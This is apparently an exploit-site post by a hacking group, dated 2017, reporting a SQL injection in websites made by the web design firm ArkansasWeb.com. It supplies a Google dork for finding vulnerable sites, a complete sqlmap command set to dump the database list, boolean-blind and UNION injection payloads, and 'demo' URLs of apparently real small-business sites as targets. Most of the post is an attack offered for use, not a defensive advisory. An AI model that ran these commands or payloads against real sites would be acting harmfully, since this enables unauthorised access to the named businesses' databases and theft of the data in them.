-->

ArkansasWeb.com Sql İnjection Vulnerability


[CODE]#################################################################################
# Exploit Title: ArkansasWeb.com Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=
# Vendor Home: https://www.arkansasweb.com/
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-10-11
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################

Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=254 AND 4058=4058

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#


Demo :
http://www.employment4u.com/jobdescription.php?id=254
http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]